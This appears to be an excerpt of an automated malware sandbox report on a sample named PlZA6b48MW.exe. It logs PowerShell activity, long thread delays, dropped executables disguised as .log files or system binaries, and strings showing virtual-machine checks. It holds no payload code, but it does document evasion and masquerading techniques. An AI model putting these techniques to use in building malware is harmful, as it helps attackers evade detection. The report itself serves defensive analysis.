                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 760000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1A440000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe Memory allocated: 8B0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe Memory allocated: 1A7C0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe Memory allocated: B80000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe Memory allocated: 1A650000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 10D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1AD90000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1180000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1AE90000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Memory allocated: 11A0000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Memory allocated: 1AB40000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Memory allocated: 10D0000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Memory allocated: 1ABD0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1340000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1B020000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 16C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1B190000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Memory allocated: 26F0000 memory reserve | memory write watch
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Memory allocated: 1A920000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 930000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Memory allocated: 1A5D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3043Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2751Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2823Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3025
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3066
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2329
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZwLVNbth.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\YNJEaDTu.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\bTenUpua.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\LARQmQKJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\uWGScrdc.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\kkpLxnoP.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\dZJDzodr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\CwRRQJIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\UqqnPMXK.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\MiiYvNyr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\euKdPjTG.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\nIcTiRiZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\IXnYeTUQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\OeqoqbNM.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\RCSpyiiu.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\mSTLtqAw.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\kAfKNzod.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\FvWYGyIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZBNMMRPs.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeDropped PE file which has not been started: C:\Users\user\Desktop\GOnzOWoM.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep count: 3043 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 2751 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep count: 2823 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep count: 3025 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep count: 3066 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 2329 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe TID: 8208Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe TID: 6616Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 7164Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8288Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8296Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8300Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8328Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8280Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8536Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8404Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8828Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe TID: 8712Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8980Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe TID: 8856Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: PlZA6b48MW.exe, 0000002F.00000002.2335905450.000000001BA80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: PlZA6b48MW.exe, 00000000.00000002.1818455182.000000001B64D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: w32tm.exe, 00000033.00000002.1917011073.000001BFD85B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2418080151.000000001AEFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln9W6
                            Source: PlZA6b48MW.exe, 00000000.00000002.1818170448.000000001B5FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MappingStr
                            Source: WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B3DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
